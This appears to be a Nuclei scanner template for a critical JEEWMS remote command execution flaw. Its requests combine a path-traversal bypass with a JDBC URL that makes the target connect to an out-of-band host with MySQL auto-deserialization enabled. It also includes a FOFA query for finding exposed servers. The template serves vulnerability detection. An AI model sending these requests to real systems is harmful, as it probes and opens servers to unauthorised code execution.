-
Notifications
You must be signed in to change notification settings - Fork 1
/
jeewms-dynamicDataSourceController-rce.yaml
27 lines (24 loc) · 1.45 KB
/
jeewms-dynamicDataSourceController-rce.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
id: jeewms-dynamicDataSourceController-rce
info:
name: JEEWMS dynamicDataSourceController - Remote Command Execution
author: Co5mos
severity: critical
description: JEEWMS is vulnerable to a remote command execution via deserialization in its DynamicDataSourceController, utilizing a controllable JDBC URL.
reference:
- http://wiki.fofamini.com/%E6%BC%8F%E6%B4%9E%E5%BA%93/Web%E5%AE%89%E5%85%A8/JEEWMS/JEEWMS%E5%AD%98%E5%9C%A8%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
metadata:
fofa-query: body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
tags: rce,jeewms,deserialization
http:
- method: GET
path:
- "{{BaseURL}}/rest/../dynamicDataSourceController.do?testConnection&driverClass=com.mysql.jdbc.Driver&url=jdbc:mysql://{{interactsh-url}}/test?detectCustomCollations=true%26autoDeserialize=true&dbUser=test_user"
- "{{BaseURL}}//api/..;/dynamicDataSourceController.do?testConnection&driverClass=com.mysql.jdbc.Driver&url=jdbc:mysql://{{interactsh-url}}/test?detectCustomCollations=true%26autoDeserialize=true&dbUser=test_user"
- "{{BaseURL}}/api/../dynamicDataSourceController.do?testConnection&driverClass=com.mysql.jdbc.Driver&url=jdbc:mysql://{{interactsh-url}}/test?detectCustomCollations=true%26autoDeserialize=true&dbUser=test_user"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(interactsh_protocol, 'dns')
condition: and